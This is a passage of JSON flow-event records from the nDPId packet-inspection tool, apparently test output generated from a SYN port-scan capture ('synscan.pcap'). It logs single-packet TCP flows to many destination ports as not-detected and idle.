+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
